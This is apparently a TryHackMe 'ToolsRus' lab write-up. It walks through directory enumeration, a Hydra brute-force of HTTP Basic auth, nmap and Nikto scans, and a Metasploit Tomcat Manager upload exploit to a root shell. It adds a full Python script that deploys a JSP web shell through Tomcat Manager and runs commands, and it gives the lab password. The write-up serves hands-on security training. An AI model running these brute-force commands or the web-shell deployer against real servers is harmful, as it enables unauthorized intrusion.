This is the write-up for the ToolsRus room on TryHackMe; it is part of the Web Fundamentals path.
Connect to the TryHackMe lab environment with the VPN, or use the AttackBox on the TryHackMe site.
TASKS ToolsRus
Task 1
Start up the machine attached to this room.
1.1 What directory can you find, that begins with a “g”?
We can use DirBuster to enumerate directories. Open a terminal and start it with the following command: dirbuster
Fill in the fields as shown in the screenshot below, but change the target IP to that of your machine.
Press start
I always like to see the tree view. The scan is still running, but we can already see the answer to this question.
Answer: guidelines
1.2 Whose name can you find from this directory?
Navigating to this directory in Firefox gives us the name.
1.3 What directory has basic authentication?
The scan is still running, but we can already see another directory called protected.
Answer: protected
1.4 What is bob’s password to the protected part of the website?
We know the username is bob, but we do not know his password.
First we intercept a login attempt with Burp, using username bob and password password1234.
We see that the Authorization header is HTTP Basic authentication: the credentials are sent as the Base64 encoding of user:password. That is encoding, not encryption, so anyone who intercepts the header can decode the credentials directly, and the same header format lets a tool like Hydra try a password list at full speed.
Options for Hydra:
Type in the command
hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.84.151 http-get /protected
-l sets the single username, -P the password wordlist, and -f stops as soon as a valid password is found. http-get /protected tells Hydra to attack the Basic authentication on the /protected directory using GET requests.
Here is a nice guide to help you further with hydra and basic authentication
Defeating HTTP Basic Auth with Hydra – Code Zen (tylerrockwell.github.io)
1.5 What other port that serves a webs service is open on the machine?
Run the following command to find the open ports and identify the services behind them (-sC runs the default scripts, -sV probes for versions). By default nmap only checks the 1000 most common TCP ports; add -p- if you want all 65535.
nmap -sC -sV -T4 <MACHINE_IP>
Answer: 1234
1.6 Going to the service running on that port, what is the name and version of the software? Answer format: Full_name_of_service/Version
We do not need to browse to the site; the answer is in our nmap output.
Answer: Apache Tomcat/7.0.88
1.7 Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. How many documentation files did Nikto identify?
Options for Nikto
Use the following Nikto command (replace the password with the one you found). -root sets the base path to scan, -port the port, and -id the user:password pair Nikto uses for Basic authentication.
nikto -host 10.10.84.151 -root /manager/html -port 1234 -id bob:PASSWORDYOUHAVEFOUND
Answer: 5
1.8 What is the server version (run the scan against port 80)?
This is also in the nmap scan we did in 1.5.
Answer: apache/2.4.18
1.9 What version of Apache-Coyote is this service using?
This is also in the nmap scan we did in 1.5.
Answer: 1.1
1.10 Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as?
We know the service on port 1234 is Apache Tomcat 7.0.88 (Coyote 1.1) and we have working credentials for its manager application. A bit of searching turns up a Metasploit module that uses exactly that: the manager lets an authenticated user deploy a WAR file, and a malicious WAR means code execution.
Apache Tomcat Manager Authenticated Upload Code Execution (rapid7.com)
Open the msfconsole in a terminal
Now we can select and configure the exploit in Metasploit by typing in the following (httppassword is the password found in 1.4; tun0 is the VPN interface, so if you work from the AttackBox set lhost to its own IP instead):
use exploit/multi/http/tomcat_mgr_upload
set target 0
set httppassword bubbles
set httpusername bob
set rhost 10.10.84.151
set rport 1234
set lhost tun0
run
Type shell to drop from the Meterpreter session into a system shell, then type whoami.
Answer: root
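To make clear what the Metasploit module is doing, here is a manual equivalent as an added example (not the room's solution and not Metasploit's code): build a WAR in memory that contains a single JSP, deploy it through the Tomcat Manager with the Basic-auth credentials recovered in 1.4, then call the JSP with a command. It uses the manager's text interface (/manager/text/deploy with a PUT), which is simpler to script than the /manager/html upload form the browser uses. Assumptions not stated on the page: bob's account holds the manager-script role that the text interface requires, and the context path /tooling is unused on the target.

```python
"""Manual equivalent of exploit/multi/http/tomcat_mgr_upload.

Added example, not Metasploit's implementation. Assumes the credentials have
the manager-script role and that the context path /tooling is free; both are
assumptions for this illustration, not facts from the write-up.
"""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# JSP that runs one command passed as ?cmd=... and returns its output.
# Constructed for this example; at the WAR root it is served at /<path>/cmd.jsp
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>"""


def build_war(jsp_source, jsp_name="cmd.jsp"):
    """Return the bytes of a WAR (a zip file) holding only the JSP.

    Tomcat needs no web.xml for a JSP-only application, so one entry is enough.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_contents(war_bytes):
    """Map entry name -> text for a WAR, used to check what we are about to deploy."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return {name: war.read(name).decode() for name in war.namelist()}


def deploy_url(base, app_path):
    """Manager text-interface deploy URL: PUT the WAR body to /manager/text/deploy?path=/app."""
    return f"{base.rstrip('/')}/manager/text/deploy?{urllib.parse.urlencode({'path': app_path})}"


def deploy_war(base, user, password, app_path, war_bytes):
    """Upload the WAR with Basic auth; Tomcat answers 'OK - Deployed application at context path ...'."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(
        deploy_url(base, app_path), data=war_bytes, method="PUT",
        headers={"Authorization": f"Basic {token}", "Content-Type": "application/octet-stream"},
    )
    with urllib.request.urlopen(req, timeout=20) as resp:
        return resp.read().decode(errors="replace")


def run_command(base, app_path, cmd, jsp_name="cmd.jsp"):
    """Invoke the deployed JSP with a command and return whatever it printed."""
    url = f"{base.rstrip('/')}{app_path}/{jsp_name}?{urllib.parse.urlencode({'cmd': cmd})}"
    with urllib.request.urlopen(url, timeout=20) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    BASE = "http://10.10.84.151:1234"   # Tomcat port from the nmap scan
    APP = "/tooling"                    # assumed free context path
    war = build_war(CMD_JSP)
    print(deploy_war(BASE, "bob", "bubbles", APP, war))
    print(run_command(BASE, APP, "id"))
```

Because Tomcat runs the JSP as its own process user, the command output tells you immediately who you have become, which on this machine is root. Undeploy the application (/manager/text/undeploy?path=/tooling) when you are done so the web shell is not left behind.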
1.11 What text is in the file /root/flag.txt
Type cat /root/flag.txt to read the flag.